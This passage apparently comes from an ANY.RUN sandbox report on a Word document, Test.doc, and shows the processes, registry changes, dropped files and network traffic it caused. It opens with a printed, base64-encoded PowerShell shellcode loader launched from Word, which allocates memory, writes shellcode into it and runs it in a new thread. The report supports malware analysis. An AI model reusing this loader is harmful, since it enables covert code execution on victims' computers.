HgANABiACwAMAB4ADMAOAAsADAAeABlADMALAAwAHgANABlACwAMAB4ADcAMwAsADAAeAA1AGEALAAwAHgANABjACwAMAB4ADIAZQAsADAAeABkADEALAAwAHgAMQAwACwAMAB4ADYAMAAsADAAeAAzAGIALAAwAHgANgA4ACwAMAB4ADcAYgAsADAAeABlAGMALAAwAHgAOAA4ACwAMAB4ADQAMQAsADAAeAA4ADQALAAwAHgAZQBjACwAMAB4ADgANgAsADAAeABkADIALAAwAHgAZgA3ACwAMAB4AGQAZQAsADAAeAAwADkALAAwAHgANAA5ACwAMAB4ADkAMAAsADAAeAA1ADIALAAwAHgAYwAxACwAMAB4ADUANwAsADAAeAA2ADcALAAwAHgAOQA1ACwAMAB4AGYAOAAsADAAeAAyADAALAAwAHgAZgA3ACwAMAB4ADYAOAAsADAAeAAwADMALAAwAHgANQAxACwAMAB4AGQAMQAsADAAeABhAGUALAAwAHgANQA3ACwAMAB4ADAAMQAsADAAeAA0ADkALAAwAHgAMAA3ACwAMAB4AGQAOAAsADAAeABjAGEALAAwAHgAOAA5ACwAMAB4AGEAOAAsADAAeAAwAGQALAAwAHgANgA2ACwAMAB4ADgAZgAsADAAeAAzAGUALAAwAHgANgBlACwAMAB4AGQAZgAsADAAeAA4ADUALAAwAHgAYQBjACwAMAB4ADAANgAsADAAeAAyADIALAAwAHgAOQBhACwAMAB4AGMANQAsADAAeAA2ADUALAAwAHgAYQBiACwAMAB4ADcAYwAsADAAeABiADUALAAwAHgAZAA5ACwAMAB4AGYAYwAsADAAeABkADAALAAwAHgANwA1ACwAMAB4ADgAYQAsADAAeABiAGMALAAwAHgAOAAwACwAMAB4ADEAZAAsADAAeABjADAALAAwAHgAMwAyACwAMAB4AGYAZQAsADAAeAAzAGQALAAwAHgAZQBiACwAMAB4ADkAOAAsADAAeAA5ADcALAAwAHgAZAA3ACwAMAB4ADAANAAsADAAeAA3ADUALAAwAHgAYwBmACwAMAB4ADQAZgAsADAAeABiAGMALAAwAHgAZABjACwAMAB4ADkAYgAsADAAeABlAGUALAAwAHgANAAxACwAMAB4AGMAYgAsADAAeABlADEALAAwAHgAMwAwACwAMAB4AGMAOQAsADAAeABmADgALAAwAHgAMQA2ACwAMAB4AGYAZQAsADAAeAAzAGEALAAwAHgANwA0ACwAMAB4ADAANQAsADAAeAA5ADYALAAwAHgAYwBhACwAMAB4AGMAMwAsADAAeAA3ADcALAAwAHgAMwAwACwAMAB4AGQANAAsADAAeABmADkALAAwAHgAMQAyACwAMAB4AGIAYwAsADAAeAA0ADAALAAwAHgAMAA2ACwAMAB4AGIANQAsADAAeABlAGIALAAwAHgAZgBjACwAMAB4ADAANAAsADAAeABlADAALAAwAHgAZABiACwAMAB4AGEAMgAsADAAeABmADcALAAwAHgAYwA3ACwAMAB4ADUAMAAsADAAeAA2AGEALAAwAHgANgAyACwAMAB4AGEAOAAsADAAeAAwAGUALAAwAHgAOQAzACwAMAB4ADYAMgAsADAAeAAyADgALAAwAHgAYwBlACwAMAB4AGMANQAsADAAeABlADgALAAwAHgAMgA4ACwAMAB4AGEANgAsADAAeABiADEALAAwAHgANAA4ACwAMAB4ADcAYgAsADAAeABkADMALAAwAHgAYgBkACwAMAB4ADQANAAsADAAeABlAGYALAAwAHgANAA4ACwAMAB4ADIAOAAsADAAeAA2ADcALAAwAHgANAA2ACwAMAB4ADMAZAAsADAAeABmAGIALAAwAHgAMABmACwAMAB4ADYANAAsADAAeAAxADgALAAwAHgAYwBiACwAMAB4ADgAZgAsADAAeAA5ADcALAAwAHgANABmACwAMAB4AGMAZAAsADAAeABlAGMALAAwAHgANAAxACwAMAB4AGEAOQAsADAAeABiAGIALAAwAHgAMQBjACwAMAB4ADUAMgA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAQwB3AGgAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAEMAdwBoAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABDAHcAaAAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAEcAOAB0ACkAKQA7ACQAQwBIAFMAIAA9ACAAIgAtAGUAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAGsAdwB2AEYAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAawB3AHYARgAgACQAQwBIAFMAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAQwBIAFMAIAAkAGUAIgA7AH0AC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3976"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\oj8rtmb2.cmdline"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
8.0.50727.4927 (NetFXspW7.050727-4900)
Modules
Images
c:\windows\microsoft.net\framework\v2.0.50727\csc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
Total events
1 865
Read events
1 116
Write events
737
Delete events
12

Modification events

(PID) Process:(2108) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:/h
Value:
2F7F68003C080000010000000000000000000000
(PID) Process:(2108) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2108) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(2108) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1296433167
(PID) Process:(2108) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1296433280
(PID) Process:(2108) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1296433281
(PID) Process:(2108) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
3C0800002E5E1BF41C5DD40100000000
(PID) Process:(2108) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:)`h
Value:
296068003C08000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2108) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:)`h
Value:
296068003C08000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2108) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
0
Suspicious files
4
Text files
8
Unknown types
4

Dropped files

PID
Process
Filename
Type
2108WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR178F.tmp.cvr
MD5:
SHA256:
3828powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\M4HN8LAB70EO0EOBJ6R5.temp
MD5:
SHA256:
1320powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OJ9111GMVZ0Z5742YKX0.temp
MD5:
SHA256:
1320powershell.exeC:\Users\admin\AppData\Local\Temp\oj8rtmb2.0.cs
MD5:
SHA256:
1320powershell.exeC:\Users\admin\AppData\Local\Temp\oj8rtmb2.cmdline
MD5:
SHA256:
3976csc.exeC:\Users\admin\AppData\Local\Temp\CSC25F7.tmp
MD5:
SHA256:
3976csc.exeC:\Users\admin\AppData\Local\Temp\oj8rtmb2.pdb
MD5:
SHA256:
3976csc.exeC:\Users\admin\AppData\Local\Temp\oj8rtmb2.dll
MD5:
SHA256:
1684cvtres.exeC:\Users\admin\AppData\Local\Temp\RES25F8.tmp
MD5:
SHA256:
3976csc.exeC:\Users\admin\AppData\Local\Temp\oj8rtmb2.out
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
3
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
88.221.134.217:80
http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEBPqKHBb9OztDDZjCYBhQzY%3D
unknown
der
471 b
whitelisted
GET
200
88.221.134.217:80
http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTNMNJMNDqCqx8FcBWK16EHdimS6QQUU3m%2FWqorSs9UgOHYm8Cd8rIDZssCEAXk3DuUOKs7hZfLpqGYUOM%3D
unknown
der
727 b
whitelisted
1056
svchost.exe
GET
200
93.184.220.29:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D
US
der
471 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1056
svchost.exe
93.184.220.29:80
ocsp.digicert.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
3748
gup.exe
37.59.28.236:443
notepad-plus-plus.org
OVH SAS
FR
whitelisted
88.221.134.217:80
ocsp.usertrust.com
Akamai International B.V.
whitelisted

DNS requests

Domain
IP
Reputation
notepad-plus-plus.org
  • 37.59.28.236
whitelisted
ocsp.usertrust.com
  • 88.221.134.217
whitelisted
ocsp.digicert.com
  • 93.184.220.29
whitelisted

Threats

No threats detected
Process
Message
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Test.doc